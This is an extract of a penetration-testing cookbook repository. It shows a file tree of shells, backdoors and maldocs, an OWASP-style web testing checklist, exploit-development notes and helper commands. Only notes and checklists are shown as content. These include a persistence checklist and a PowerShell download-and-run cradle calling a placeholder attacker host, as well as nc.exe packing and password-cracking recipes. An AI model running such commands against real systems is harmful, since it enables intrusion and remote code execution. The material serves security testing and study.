Repository: tasooshi/pentesting-cookbook
Branch: master
Commit: c0f1f13bfa81
Files: 151
Total size: 3.0 MB

Directory structure:
gitextract_leidmqwb/

├── .gitignore
├── Notes.Checklist.txt
├── Notes.Exploits.txt
├── Notes.Helpers.txt
├── Notes.Wordlists.txt
├── README.md
├── Target.Host.OS.Linux.txt
├── Target.Host.OS.Shells.txt
├── Target.Host.OS.Windows.txt
├── Target.Host.Service.AD.txt
├── Target.Host.Service.AMQP.txt
├── Target.Host.Service.DB.MSSQL.txt
├── Target.Host.Service.DB.MySQL.txt
├── Target.Host.Service.DB.PostgreSQL.txt
├── Target.Host.Service.FTP.txt
├── Target.Host.Service.HTTP.txt
├── Target.Host.Service.IDENT.txt
├── Target.Host.Service.LDAP.txt
├── Target.Host.Service.MSRPC.txt
├── Target.Host.Service.NFS.txt
├── Target.Host.Service.POP3.txt
├── Target.Host.Service.RDP.txt
├── Target.Host.Service.RPC.txt
├── Target.Host.Service.SMB.txt
├── Target.Host.Service.SMTP.txt
├── Target.Host.Service.SNMP.txt
├── Target.Host.Service.SSH.txt
├── Target.Host.Service.TELNET.txt
├── Target.Host.Service.VNC.txt
├── Target.Host.Service.X11.txt
├── Target.Network.Pivoting.txt
├── Target.Network.Scanning.txt
├── Target.Network.Wireless.txt
├── Target.Recon.DNS.txt
├── Target.Recon.Dorks.txt
├── Target.Recon.OSINT.txt
├── bin/
│   ├── direnum_combo.sh
│   ├── dns_cnames.sh
│   ├── dns_resolve.sh
│   ├── dns_transfer.sh
│   ├── download_files.sh
│   ├── download_int.sh
│   ├── ftp_server.py
│   ├── hexdecode.py
│   ├── hexreverse.py
│   ├── http_codes.sh
│   ├── httpd.py
│   ├── mac_oui.sh
│   ├── mitm_toolkit.py
│   ├── parse_gnmap.sh
│   ├── ping.py
│   ├── ping.sh
│   ├── quote.py
│   ├── scan_top.sh
│   ├── snmp_enum.sh
│   ├── snmp_public_hosts.sh
│   ├── ssh_enum_malform.py
│   ├── ssh_enum_time.py
│   ├── tomcat_brute.py
│   ├── vba_format.py
│   ├── vbe_decoder.py
│   └── xor.py
└── snippets/
    ├── html/
    │   └── smuggling.html
    ├── java/
    │   ├── shells/
    │   │   ├── reverse/
    │   │   │   ├── reverse.jsp
    │   │   │   ├── reverse_bash.java
    │   │   │   └── reverse_php.java
    │   │   └── web/
    │   │       └── webshell.jsp
    │   └── utils/
    │       └── jenkins_console.groovy
    ├── linux/
    │   ├── backdoors/
    │   │   ├── ssh_reconnect.sh
    │   │   ├── suid_popen.c
    │   │   └── suid_shell.c
    │   ├── maldocs/
    │   │   └── runner-1.c
    │   ├── shells/
    │   │   ├── bind/
    │   │   │   └── udp.sh
    │   │   └── reverse/
    │   │       ├── reverse.c
    │   │       └── reverse.pl
    │   └── utils/
    │       ├── bruteforce.sh
    │       ├── ld_preload.c
    │       ├── persistence.py
    │       ├── port_scanning1.sh
    │       ├── ps_monitoring.sh
    │       ├── python_pickle.py
    │       └── so_injection.c
    ├── php/
    │   └── recursive_dir.php
    ├── python/
    │   └── port_scanning.py
    ├── windows/
    │   ├── maldocs/
    │   │   ├── downloader-1.cs
    │   │   ├── downloader-1.js
    │   │   ├── downloader-1.ps1
    │   │   ├── downloader-1.vba
    │   │   ├── downloader-1.vbs
    │   │   ├── downloader-1.xls
    │   │   ├── downloader-2.js
    │   │   ├── downloader-2.vba
    │   │   ├── evasion-1.cs
    │   │   ├── evasion-1.hta
    │   │   ├── evasion-1.inf
    │   │   ├── evasion-1.sct
    │   │   ├── evasion-1.url
    │   │   ├── evasion-1.wsf
    │   │   ├── evasion-2.hta
    │   │   ├── evasion-2.inf
    │   │   ├── evasion-2.sct
    │   │   ├── evasion-msxml.xml
    │   │   ├── evasion-msxml.xsl
    │   │   ├── ntlm-1.url
    │   │   ├── ntlm-evasion-mssql-1.csproj
    │   │   ├── runner-1.cs
    │   │   ├── runner-1.ps1
    │   │   └── runner-1.vba
    │   ├── shells/
    │   │   ├── bind/
    │   │   │   ├── PortListener.ps1
    │   │   │   ├── web1.asp
    │   │   │   ├── web2.asp
    │   │   │   ├── web3.asp
    │   │   │   └── web4.aspx
    │   │   └── reverse/
    │   │       ├── reverse1.bat
    │   │       ├── reverse1.cpp
    │   │       ├── reverse1.cs
    │   │       ├── reverse1.ps1
    │   │       ├── reverse2.cpp
    │   │       ├── reverse2.ps1
    │   │       └── reverse_dll.c
    │   └── utils/
    │       ├── DomainPasswordSpray.ps1
    │       ├── Enable-Privilege.ps1
    │       ├── GrabAndRun.ps1
    │       ├── Invoke-Mimikatz-latest.ps1
    │       ├── PortScanning.ps1
    │       ├── Self-Elevate.ps1
    │       ├── SharingIsCaring.ps1
    │       ├── Start-WebServer.ps1
    │       ├── SuperPing.ps1
    │       ├── Win10FirewallRules.ps1
    │       ├── WindowsEnum.ps1
    │       ├── base64.vbs
    │       ├── ftp.bat
    │       ├── icacls.bat
    │       ├── info.aspx
    │       ├── mimikatz-Invoke-Mimikatz-obfuscate.sh
    │       ├── mimikatz-clone-obfuscated.sh
    │       ├── minidump.cs
    │       ├── run_bat.c
    │       ├── run_dll1.c
    │       ├── run_dll2.cpp
    │       ├── runas1.bat
    │       ├── runas2.bat
    │       ├── schcheck.bat
    │       ├── tcpwrecovery.py
    │       ├── update_invoke_mimikatz.py
    │       ├── useradd.c
    │       ├── wget_ps1.bat
    │       ├── wget_vbs.bat
    │       └── winscppassword.py
    └── xml/
        └── xee.txt

================================================
FILE CONTENTS
================================================

================================================
FILE: .gitignore
================================================
.DS_Store


================================================
FILE: Notes.Checklist.txt
================================================
-- Source: https://github.com/0xRadi/OWASP-Web-Checklist

`` Steps

    - Malware Injection (Spear-Phish, Web Exploits, etc)
    - Reconnaissance (Internal)
    - Credential Theft
    - Exploitation & Privilege Escalation
    - Data Access & Exfiltration
    - Persistence (retaining access)

`` Persistence

    - Process injection
    - Binary patching
    - Valid user accounts
    - Vulnerable script code
    - Avoid port binding
    - Use AT to run your commands
    - Good rootkit
    - Be noisy on one to divert attention from another
    - Change strategies to match environment's normal behavior

`` Reconnaissance

    - Manually explore the site
    - Spider/crawl for missed or hidden content
    - Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
    - Check the caches of major search engines for publicly accessible sites
    - Check for differences in content based on User-Agent (e.g. mobile sites, access as a search-engine crawler)
    - Perform Web Application Fingerprinting
    - Identify technologies used
    - Identify user roles
    - Identify application entry points
    - Identify client-side code
    - Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
    - Identify co-hosted and related applications
    - Identify all hostnames and ports
    - Identify third-party hosted content

`` Configuration

    - Check for commonly used application and administrative URLs
    - Check for old, backup and unreferenced files
    - Check HTTP methods supported and Cross Site Tracing (XST)
    - Test file extensions handling
    - Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
    - Test for policies (e.g. Flash, Silverlight, robots)
    - Test for non-production data in live environment, and vice-versa
    - Check for sensitive data in client-side code (e.g. API keys, credentials)

`` Transmission

    - Check SSL Version, Algorithms, Key length
    - Check for Digital Certificate Validity (Duration, Signature and CN)
    - Check credentials only delivered over HTTPS
    - Check that the login form is delivered over HTTPS
    - Check session tokens only delivered over HTTPS
    - Check if HTTP Strict Transport Security (HSTS) in use

`` Authentication

    - Test for user enumeration
    - Test for authentication bypass
    - Test for bruteforce protection
    - Test password quality rules
    - Test remember me functionality
    - Test for autocomplete on password forms/input
    - Test password reset and/or recovery
    - Test password change process
    - Test CAPTCHA
    - Test multi factor authentication
    - Test for logout functionality presence
    - Test for cache management on HTTP (e.g. Pragma, Expires, Max-age)
    - Test for default logins
    - Test for user-accessible authentication history
    - Test for out-of-channel notification of account lockouts and successful password changes
    - Test for consistent authentication across applications with shared authentication schema / SSO

`` Sessions

    - Establish how session management is handled in the application (e.g. tokens in cookies, tokens in the URL)
    - Check session tokens for cookie flags (httpOnly and secure)
    - Check session cookie scope (path and domain)
    - Check session cookie duration (expires and max-age)
    - Check session termination after a maximum lifetime
    - Check session termination after relative timeout
    - Check session termination after logout
    - Test to see if users can have multiple simultaneous sessions
    - Test session cookies for randomness
    - Confirm that new session tokens are issued on login, role change and logout
    - Test for consistent session management across applications with shared session management
    - Test for session puzzling
    - Test for CSRF and clickjacking

`` Authorization

    - Test for path traversal
    - Test for bypassing authorization schema
    - Test for vertical Access control problems (a.k.a. Privilege Escalation)
    - Test for horizontal Access control problems (between two users at the same privilege level)
    - Test for missing authorization

`` Validation

    - Test for Reflected Cross Site Scripting
    - Test for Stored Cross Site Scripting
    - Test for DOM based Cross Site Scripting
    - Test for Cross Site Flashing
    - Test for HTML Injection
    - Test for SQL Injection
    - Test for LDAP Injection
    - Test for ORM Injection
    - Test for XML Injection
    - Test for XXE Injection
    - Test for SSI Injection
    - Test for XPath Injection
    - Test for XQuery Injection
    - Test for IMAP/SMTP Injection
    - Test for Code Injection
    - Test for Expression Language Injection
    - Test for Command Injection
    - Test for Overflow (Stack, Heap and Integer)
    - Test for Format String
    - Test for incubated vulnerabilities
    - Test for HTTP Splitting/Smuggling
    - Test for HTTP Verb Tampering
    - Test for Open Redirection
    - Test for Local File Inclusion
    - Test for Remote File Inclusion
    - Compare client-side and server-side validation rules
    - Test for NoSQL injection
    - Test for HTTP parameter pollution
    - Test for auto-binding
    - Test for Mass Assignment
    - Test for NULL/Invalid Session Cookie

`` Denial of Service

    - Test for anti-automation
    - Test for account lockout
    - Test for HTTP protocol DoS
    - Test for SQL wildcard DoS

`` Business Logic

    - Test for feature misuse
    - Test for lack of non-repudiation
    - Test for trust relationships
    - Test for integrity of data
    - Test segregation of duties

`` Cryptography

    - Check if data which should be encrypted is not
    - Check for wrong algorithms usage depending on context
    - Check for weak algorithms usage
    - Check for proper use of salting
    - Check for randomness functions

`` File Uploads

    - Test that acceptable file types are whitelisted
    - Test that file size limits, upload frequency and total file counts are defined and are enforced
    - Test that file contents match the defined file type
    - Test that all file uploads have Anti-Virus scanning in place
    - Test that unsafe filenames are sanitised
    - Test that uploaded files are not directly accessible within the web root
    - Test that uploaded files are not served on the same hostname/port
    - Test that files and other media are integrated with the authentication and authorisation schemas

`` Payments

    - Test for known vulnerabilities and configuration issues on Web Server and Web Application
    - Test for default or guessable password
    - Test for non-production data in live environment, and vice-versa
    - Test for Injection vulnerabilities
    - Test for Buffer Overflows
    - Test for Insecure Cryptographic Storage
    - Test for Insufficient Transport Layer Protection
    - Test for Improper Error Handling
    - Test for all vulnerabilities with a CVSS v2 score > 4.0
    - Test for Authentication and Authorization issues
    - Test for CSRF

`` HTML 5

    - Test Web Messaging
    - Test for Web Storage SQL injection
    - Check CORS implementation
    - Check Offline Web Application


================================================
FILE: Notes.Exploits.txt
================================================
`` Fuzzing

    # TODO: Upload phazz sources

    ~$ phazz.py fuzz -h VAR_TARGET_HOST -p 69 -n 100 -l 3000 -s tftp:read -m char -d
    ~$ phazz.py fuzz -h VAR_TARGET_HOST -p 80 -n 100 -l 3000 -s http:get -m ascii -d

`` Debuggers

    `` ASLR check

        ~$ cat /proc/sys/kernel/randomize_va_space

    `` Binary security check

        ~$ checksec

`` Disassembling

    ~$ echo -ne '\xd3\xfe\x86\x7c' | ndisasm -b32 -

`` Payloads

    `` Test string (2700)

        test_payload = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn
8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9'

    `` Bad characters

        bad_characters = (
            '\x00'
            '\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10'
            '\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20'
            '\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30'
            '\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40'
            '\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50'
            '\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60'
            '\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70'
            '\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80'
            '\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90'
            '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0'
            '\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0'
            '\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0'
            '\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0'
            '\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0'
            '\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0'
            '\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
        )

        http = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40"
        generic = "\x00\x0a\x0d\xff"
        ftp = "\x00\x0a\x0d\x2f\x5c"

    `` Pattern

        ~$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000

        ~$ phazz.py pattern -m ascii -l 2000

    `` Offset

        ~$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2000 -q 68433568

        ~$ phazz.py pattern -m ascii -l 2000 -q 68433568

    `` nasm

        ~$ /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
        nasm > jmp eax


================================================
FILE: Notes.Helpers.txt
================================================
`` Compression

    ~$ 7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=32m -ms=on -mhe=on -p archive.7z ./directory/

`` Convert raw payload to comma-separated hex

    ~$ hexdump -ve '1/1 ",0x%02x"' payload.raw | sed "s/^,//" > payload.txt

`` Convert payload to hex

    ~$ echo '<?php $sock=fsock[...]$pipes); ?>' | xxd -ps | tr -d '\n'
        # 3c3f70...
    ~$ echo 3c3f70... | xxd -ps -r

`` Powershell

  `` Base64 encoding

      ~PS> $text = "(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/run.txt') | IEX"
      ~PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
      ~PS> $EncodedText = [Convert]::ToBase64String($bytes)
      ~PS> $EncodedText

`` Sources

    `` Update Git library

        ~$ export TMPPWD=$PWD; export GIT_ASKPASS=echo; for x in $(find . -name '.git' -type d | xargs -n 1 dirname); do cd $TMPPWD; cd $x; echo -e "\n\n--> $(pwd)"; git reset --hard; git remote prune origin; git pull; done; cd $TMPPWD

    `` diff

        ~$ icdiff --strip-trailing-cr -H *.c

    `` gcc

        `` Compiling for GNU/Linux

            ~$ gcc -shared source.c -o executable
            ~$ gcc -static source.c -o executable
            ~$ gcc -m32 source.c -o executable
            ~$ gcc -m32 source.c -o executable -Wl,--hash-style=both

        `` Compiling for Windows

            ~$ i686-w64-mingw32-gcc -lws2_32 -o executable source.c
            ~$ i686-w64-mingw32-gcc -o executable source.c

        `` All files in current directory (prints the gcc commands; drop `echo` to execute them)

            ~$ for fil in $(ls *.c); do echo gcc -o ${fil::${#fil}-2} $fil; done

    `` Java

        `` Signing applets

            ~$ javac -source 1.7 -target 1.7 Java.java
            ~$ echo "Permissions: all-permissions" > manifest.txt
            ~$ jar cvf Java.jar Java.class
            ~$ jarsigner -keystore mykeystore -storepass secret -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet
            ~$ keytool -genkey -alias signapplet -keystore mykeystore -keypass secret -storepass secret
            ~$ keytool -list -v -keystore mykeystore
            ~$ jarsigner -keystore mykeystore -storepass secret -keypass secret -signedjar SignedJava.jar Java.jar signapplet

`` Packing

    `` Python to EXE

        ~$ python pyinstaller.py --onefile exploit.py

    `` EXE to BAT

        ~$ cp /usr/share/windows-binaries/nc.exe ./nc.exe
        ~$ upx -9 nc.exe
        ~$ wine /usr/share/windows-binaries/exe2bat.exe nc.exe nc.txt

`` Servers

    `` HTTP

        `` socat

            ~$ socat TCP-LISTEN:8000,crlf SYSTEM:"echo HTTP/1.0 200; echo Content-Type\: text/plain; echo; cat"

        `` Python

            ~$ python2 -m SimpleHTTPServer
            ~$ python3 -m http.server

        `` Python IPv6

            ~$ echo -e 'import BaseHTTPServer\nimport SimpleHTTPServer\nimport socket\nclass HTTPServer6(BaseHTTPServer.HTTPServer):\n address_family = socket.AF_INET6\nif __name__ == "__main__":\n SimpleHTTPServer.test(ServerClass=HTTPServer6)' | python2

        `` Ruby

            ~$ ruby -r webrick -e "WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start"

        `` PHP

            ~$ php -S 0.0.0.0:8000

        `` Perl

            ~$ cpan HTTP::Server::Brick
            ~$ perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>8000); $s->mount("/"=>{path=>"."}); $s->start'

    `` FTP

        ~$ python -m pyftpdlib -p 21 -w

    `` SMB

        ~$ sudo impacket-smbserver.py TEST .

    `` TFTP

        `` Server

            ~$ atftpd --daemon --port 69 /tftp

        `` Client

            ~$ tftp -i VAR_TARGET_HOST GET nc.exe

    `` SMTP

        `` Server

            ~$ socat - TCP-LISTEN:25,crlf
            ~$ socat readline TCP-LISTEN:25,crlf

        `` Local delivery

            ~$ socat UNIX-LISTEN:/tmp/mail,fork,perm-early=0666 exec:"/usr/sbin/sendmail -bs"
            ~$ socat - /tmp/mail

        `` Python

            ~# python -m smtpd -n -c DebuggingServer 0.0.0.0:25

`` IP

    `` Conversion

        172.217.16.14
        ((172 * 256 + 217) * 256 + 16 ) * 256 + 14 = 2899906574 = 0xacd9100e

        127.0.0.1 == 2130706433 == 7F000001 == 1111111000000000000000000000001 == 017700000001

    `` What is my IP?

        ~$ curl -s https://api.ipify.org

`` File analysis

    ~$ file executable
    ~$ binwalk executable
    ~$ foremost executable

`` Passwords

    `` Combining

        ~$ /usr/share/hashcat-utils/combinator.bin wordlist wordlist > combined
        ~$ crunch 1 2 -p combine couple words > combined

    `` Wordlists

        ~$ cewl http://VAR_TARGET_HOST -d 1 -m 6 -w wordlist

    `` Extract last column separated by :

        ~$ cat VAR_FILE | grep -o '[^:]*$'

    `` Length

        ~$ awk 'length($0)>4 && length($0)<12' unique > final

    `` Lower case and keep letters only

        ~$ awk '{print tolower($0)}' VAR_FILE | tr -d '[0-9]' | tr -d '[:punct:]'

    `` Most frequent words

        ~$ cat VAR_FILE | sort | uniq -c | sort -nr | head -n 1000

    `` Keep only the lines unique to sorted2

        ~$ comm -13 sorted1 sorted2 > sorted3

    `` Lines less than 21 chars and remove e-mail addresses

        ~$ awk 'length($0)<21' VAR_FILE | grep -vaEih '([[:alnum:]_.-]+@[[:alnum:]_.-]+?\.[[:alpha:].]{2,6})'

    `` Sort by line length

        ~$ cat VAR_FILE | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2-

    `` Sorting large password list by count

        ~$ sort --compress-program=lzop VAR_FILE --parallel 8 | uniq -c | sort --compress-program=lzop --parallel 8 -nr

    `` Remove preceding spaces

        ~$ sed 's/^ *//g' VAR_FILE

    `` Remove preceding numbers

        ~$ cut -d" " -f2- VAR_FILE

    `` Splitting lists by group/column selection

        -- Ex. "22 username;password" or "12 password:password1" (the expression below matches the ";" delimiter; change it to ":" for the second form)
        -- On macOS use -nE instead of -nr
        ~$ sed -nr 's/(.*)[[:space:]](.*);(.*)/\1 \2/p' VAR_FILE

    `` Removing duplicates based on second column with a single space delimiter (useful with uniq -c)

        ~$ sort -u -t' ' -k2,2 VAR_FILE

    `` Remove all lines containing non-printable or non-ASCII bytes (keeps printable ASCII and tab)

        -- For macOS use pcregrep (homebrew/pcre)
        ~$ LC_ALL=C grep -Pv "[\x00-\x08\x0A-\x1F\x7F-\xFF]" VAR_FILE

    `` Remove all lines with control characters (other than tab, LF and CR)

        -- For macOS use pcregrep (homebrew/pcre)
        ~$ LC_ALL=C grep -Pv "[\x00-\x08\x0B\x0C\x0E-\x1F]" VAR_FILE

    `` Permutations

        ~$ crunch 4 8 > wordlist
        ~$ hashcat -r /usr/share/hashcat/rules/hybrid/append_ldus.rule --stdout wordlist >> permuted
        ~$ hashcat -r /usr/share/hashcat/rules/hybrid/prepend_ldus.rule --stdout wordlist >> permuted
        ~$ hashcat -r /usr/share/hashcat/rules/combinator.rule --stdout wordlist >> permuted
        ~$ hashcat -r /usr/share/hashcat/rules/best64.rule --stdout wordlist >> permuted
        ~$ hashcat -r /usr/share/hashcat/rules/T0XlCv1.rule --stdout wordlist >> permuted
        ~$ hashcat -r /usr/share/hashcat/rules/unix-ninja-leetspeak.rule --stdout wordlist >> permuted
        ~$ hashcat -r /usr/share/hashcat/rules/rockyou-30000.rule --stdout wordlist >> permuted
        ~$ sort permuted | uniq > unique

    `` Hashcat modes

              # | Name                                             | Category
          ======+==================================================+======================================
            900 | MD4                                              | Raw Hash
              0 | MD5                                              | Raw Hash
            100 | SHA1                                             | Raw Hash
           1300 | SHA2-224                                         | Raw Hash
           1400 | SHA2-256                                         | Raw Hash
          10800 | SHA2-384                                         | Raw Hash
           1700 | SHA2-512                                         | Raw Hash
          17300 | SHA3-224                                         | Raw Hash
          17400 | SHA3-256                                         | Raw Hash
          17500 | SHA3-384                                         | Raw Hash
          17600 | SHA3-512                                         | Raw Hash
           6000 | RIPEMD-160                                       | Raw Hash
            600 | BLAKE2b-512                                      | Raw Hash
          11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian | Raw Hash
          11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian | Raw Hash
           6900 | GOST R 34.11-94                                  | Raw Hash
           5100 | Half MD5                                         | Raw Hash
          18700 | Java Object hashCode()                           | Raw Hash
          17700 | Keccak-224                                       | Raw Hash
          17800 | Keccak-256                                       | Raw Hash
          17900 | Keccak-384                                       | Raw Hash
          18000 | Keccak-512                                       | Raw Hash
          21400 | sha256(sha256_bin($pass))                        | Raw Hash
           6100 | Whirlpool                                        | Raw Hash
          10100 | SipHash                                          | Raw Hash
          21000 | BitShares v0.x - sha512(sha512_bin(pass))        | Raw Hash
             10 | md5($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
             20 | md5($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
           3800 | md5($salt.$pass.$salt)                           | Raw Hash, Salted and/or Iterated
           3710 | md5($salt.md5($pass))                            | Raw Hash, Salted and/or Iterated
           4110 | md5($salt.md5($pass.$salt))                      | Raw Hash, Salted and/or Iterated
           4010 | md5($salt.md5($salt.$pass))                      | Raw Hash, Salted and/or Iterated
          21300 | md5($salt.sha1($salt.$pass))                     | Raw Hash, Salted and/or Iterated
